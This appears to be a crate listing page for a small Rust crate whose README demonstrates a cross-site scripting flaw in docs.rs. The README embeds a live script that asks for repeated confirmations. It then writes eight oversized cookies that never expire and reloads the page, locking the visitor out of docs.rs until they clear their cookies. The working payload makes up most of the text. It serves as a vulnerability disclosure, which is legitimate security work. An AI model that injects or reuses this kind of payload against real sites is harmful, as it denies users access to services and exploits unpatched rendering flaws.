3 releases
0.1.2 | Mar 21, 2021 |
---|---|
0.1.1 | Mar 21, 2021 |
0.1.0 | Mar 21, 2021 |
#5 in #demonstration
3KB
🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥
This crate demonstrates an XSS vulnerability of docs.rs. To test, click the link below. In order to access docs.rs afterward, you will need to clear cookies.
🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥
<script> function bootstrap() { const doc1 = 'This is a demonstration of a security vulnerability (XSS). Click CANCEL to abort at any time.'; const doc2 = 'WARNING: If you proceed, you will not be able to access docs.rs. CLICK CANCEL if you do not wish this to happen.'; const doc3 = 'WARNING: To access docs.rs after proceeding, you will need to clear your browser cookies.'; if (!confirm(doc1) || !confirm(doc2) || !confirm(doc3)) { return; } if (prompt('Type "I understand what I need to do" to continue:') !== "I understand what I need to do") { return; } let z = 'z'; for (let i = 0; i < 4000; i++) { z = z + 'z'; } function setCookie(name) { document.cookie = name + '=' + z + '; expires=Fri, 31 Dec 9999 23:59:59 GMT; Path=/'; } ['a','b','c','d','e','f','g','h'].forEach(setCookie); window.location.reload(); } </script>